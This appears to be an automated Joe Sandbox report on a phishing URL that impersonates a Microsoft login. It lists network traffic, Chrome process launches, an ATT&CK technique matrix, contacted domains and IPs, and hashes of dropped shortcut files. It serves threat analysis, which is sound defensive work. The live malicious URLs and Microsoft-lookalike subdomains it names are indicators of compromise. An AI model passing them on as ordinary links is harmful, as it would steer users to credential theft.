            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49793 version: TLS 1.2
            Source: classification engineClassification label: mal76.phis.troj.win@18/42@52/189
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17634273882530886685,6657441781872609284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17634273882530886685,6657441781872609284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
            Encrypted Channel
            1
            Exfiltration Over Alternative Protocol
            Abuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Data Encoding
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
            Application Layer Protocol
            Traffic DuplicationData Destruction

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com100%Avira URL Cloudmalware
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              login.borlsfx.com
              104.21.8.41
              truetrue
                unknown
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  dyna.wikimedia.org
                  185.15.58.224
                  truefalse
                    high
                    cdn4.iconfinder.com
                    172.66.41.45
                    truefalse
                      high
                      enrollmentportal.borlsfx.com
                      104.21.8.41
                      truetrue
                        unknown
                        ipapi.co
                        104.26.9.44
                        truefalse
                          high
                          706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com
                          172.67.156.205
                          truetrue
                            unknown
                            cdnjs.cloudflare.com
                            104.17.25.14
                            truefalse
                              high
                              challenges.cloudflare.com
                              104.18.94.41
                              truefalse
                                high
                                707269766163792e6d6963726f736f66742e636f6d.borlsfx.com
                                172.67.156.205
                                truetrue
                                  unknown
                                  sni1gl.wpc.omegacdn.net
                                  152.199.21.175
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.181.100
                                    truefalse
                                      high
                                      upload.wikimedia.org
                                      185.15.58.240
                                      truefalse
                                        high
                                        cdn.jsdelivr.net
                                        unknown
                                        unknownfalse
                                          high
                                          aadcdn.msftauth.net
                                          unknown
                                          unknownfalse
                                            high
                                            meta.wikimedia.org
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=truetrue
                                                unknown
                                                https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comtrue
                                                  unknown
                                                  https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4dfalse
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    185.15.58.240
                                                    upload.wikimedia.orgNetherlands
                                                    14907WIKIMEDIAUSfalse
                                                    172.217.19.227
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    13.107.246.63
                                                    s-part-0035.t-0009.t-msedge.netUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    172.217.17.78
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.18.186.31
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.187.31
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.217.17.35
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    172.217.17.46
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.18.94.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.95.41
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.67.156.205
                                                    706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    104.26.9.44
                                                    ipapi.coUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.250.181.100
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    172.66.41.45
                                                    cdn4.iconfinder.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    64.233.164.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    104.21.8.41
                                                    login.borlsfx.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    152.199.21.175
                                                    sni1gl.wpc.omegacdn.netUnited States
                                                    15133EDGECASTUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.16
                                                    192.168.2.23
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1576856
                                                    Start date and time:2024-12-17 17:01:22 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Sample URL:https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal76.phis.troj.win@18/42@52/189
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 172.217.19.227, 64.233.164.84, 172.217.17.78, 172.217.17.46, 104.18.186.31, 104.18.187.31, 199.232.210.172
                                                    • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • VT rate limit hit for: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:01:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2673
                                                    Entropy (8bit):3.985502310556164
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4F93F1CB9D0AC9DAC8862654C9493DB4
                                                    SHA1:7EAFBE82F4BA8ABCF8F74E6040FCF26E76FF4D9A
                                                    SHA-256:40F67528D6989454E8CCE79CF71BEB56C78DF398ECA8B3726E5D7940468737DA
                                                    SHA-512:81A2814752D61D9394B9BD1D6418C3BC99B8A511DA48709A3E1FE50316C9472A75C9DE7AB66AD21C3DDAF0C1FF173299FB54D27B78F6ED2FB4E611450015FD5F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,...."-...P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:01:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2675
                                                    Entropy (8bit):4.002997572945797
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8CAFA5EB82439F88165D62B8BB5201F9
                                                    SHA1:736CF073B4D40F0FF82F6AC39AAC7CD8E39AA948
                                                    SHA-256:F853508134AA53E1FC0EF6DEDB2D7D3D4000ED8506EA3387C0CAB6E4EABFCF60
                                                    SHA-512:1CC9EC291607D569172F5656D525D051EF61486AB4C4DF1EACAEAAFF43129DBE811B69FA1AC08196B5AFA47469C5AC00CAA7FB21913E0C5A711475FB0AAE7B07
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.........P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2689
                                                    Entropy (8bit):4.01023854894392
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D7E5503FDA003EED9E3061631C4A1C10
                                                    SHA1:1911987EC69EA52BF50486F0D5EDEB46742715D7
                                                    SHA-256:6BB445C710F37ECAE87F4911016BBA887C607241EAB883DEB5B20E6CC489E1EC
                                                    SHA-512:5523A654131636581E9C1D468999BBE797EADBD921639555DA0D25BDB40C8B8BBF914B236EB88501A971FB50164175C3F5B7B4EAB97960D0F7E0244DA0CC60F0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:01:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.998890063248359
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6452151676FC5CFA3BC481BE94654219
                                                    SHA1:174D7DC4F04E0615684017DD4B480BC76FD1E086
                                                    SHA-256:5F0716316D9FB07152D4F72DA767EBAC6EE76034D75727ACFFC458F346BA08FD
                                                    SHA-512:CE72229C0310D69AB28DEBC3E2B8C25B17BC2733ED729DF4A52B98E4B66C9A513DB7E39FAF3C692C9808E0AC699C5180D993470D34BAC97D3C4B3446D2082AC1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....E=...P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:01:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.9904147203045635
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7ABAC070D26DDAF22204CDAB88AA234A
                                                    SHA1:DB2727EE5494A15C3B84196847F01310FD75A851
                                                    SHA-256:E038295D32BB0B7DF5445D03C0717309DC510911D62D53835CA305D82A09E83B
                                                    SHA-512:E571CE2F22CA1DC7F82CB9E1F384EC91B477B7585B6AC5196FE8538A378BF26D686BE0BF05D9090113D216BEF0367AB9442F61C5245BE12BAB734EF0B42F409C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.......P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y1.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y9.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y9.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y9............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:01:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):3.999418298138038
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:175B490081D627A6C62A51E0B17CCA9B
                                                    SHA1:955A0DBB4B6963FF8E977D0B82158C43F4B282DE
                                                    SHA-256:BE656AD9F50C62E2EE225ECEEA0DBCB944BBE7236A614E668203EAAB5AC7B9FB
                                                    SHA-512:AF1728B00D58F2379B71EAA74206E67256A4626530F48EEBCC9CDEBA38A08937A65724D8F4CEFAACB83F99EFE2AB88AE31FB85FC758364E60717E1FC6CDB9C74
                                                    Malicious:false
                                                    Reputation:unknown
